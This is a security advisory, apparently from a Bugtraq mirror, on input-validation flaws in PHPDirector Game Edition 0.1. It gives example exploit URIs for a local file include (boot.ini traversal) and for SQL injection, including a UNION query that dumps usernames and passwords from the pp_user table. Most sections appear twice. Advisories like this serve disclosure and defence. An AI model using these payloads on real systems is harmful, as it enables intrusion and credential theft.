PHPDirector Game Edition Multiple Input Validation Vulnerabilities
BID:37639
Info
PHPDirector Game Edition Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 37639 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 06 2010 12:00AM |
| Updated: | Jan 06 2010 12:00AM |
| Credit: | Zer0 Thunder |
| Vulnerable: |
PHPDirector PHPDirector Game Edition 0.1 |
| Not Vulnerable: | |
Discussion
PHPDirector Game Edition Multiple Input Validation Vulnerabilities
PHPDirector Game Edition is prone to multiple input-validation vulnerabilities:
- An HTML-injection vulnerability
- An SQL-injection vulnerability
- A local file-include vulnerability
An attacker can exploit these issues to execute arbitrary HTML or script code within the context of a victim's browser, steal cookie-based authentication credentials, compromise the affected application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary local scripts within the context of the browser. Other attacks are also possible.
PHPDirector Game Edition 0.1 is vulnerable; other versions may also be affected.
PHPDirector Game Edition is prone to multiple input-validation vulnerabilities:
- An HTML-injection vulnerability
- An SQL-injection vulnerability
- A local file-include vulnerability
An attacker can exploit these issues to execute arbitrary HTML or script code within the context of a victim's browser, steal cookie-based authentication credentials, compromise the affected application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary local scripts within the context of the browser. Other attacks are also possible.
PHPDirector Game Edition 0.1 is vulnerable; other versions may also be affected.
Exploit / POC
PHPDirector Game Edition Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/phpdirectorgameedition/header.php?lang=../../../../boot.ini%00
http://www.example.com/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.example.com/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/phpdirectorgameedition/header.php?lang=../../../../boot.ini%00
http://www.example.com/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.example.com/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
Solution / Fix
PHPDirector Game Edition Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHPDirector Game Edition Multiple Input Validation Vulnerabilities
References:
References:
- PHPDirector Game Edition Homepage (PHPDirector)